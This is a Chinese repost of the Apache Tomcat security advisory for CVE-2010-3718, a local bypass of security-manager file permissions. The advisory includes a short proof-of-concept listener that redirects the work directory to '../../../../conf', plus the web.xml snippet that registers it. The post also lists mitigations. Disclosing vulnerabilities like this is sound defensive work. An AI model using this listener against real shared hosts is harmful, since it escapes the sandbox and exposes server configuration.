来自 Apache 网站的消息:
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
受影响的版本(oschina目前用的是7.0.6):
– Tomcat 7.0.0 to 7.0.3
– Tomcat 6.0.0 to 6.0.?
– Tomcat 5.5.0 to 5.5.?
– Earlier, unsupported versions may also be affected
漏洞描述:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
—————
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute("javax.servlet.context.tempdir");
if (workdir.toString().indexOf("..") < 0) {
context.setAttribute("javax.servlet.context.tempdir",
new java.io.File(workdir, "../../../../conf"));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
—————
<listener>
<listener-class>listeners.FooListener</listener-class>
</listener>
Mitigation:
Users of affected versions should apply one of the following mitigations:
– Upgrade to a Tomcat version where this issue is fixed
– Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html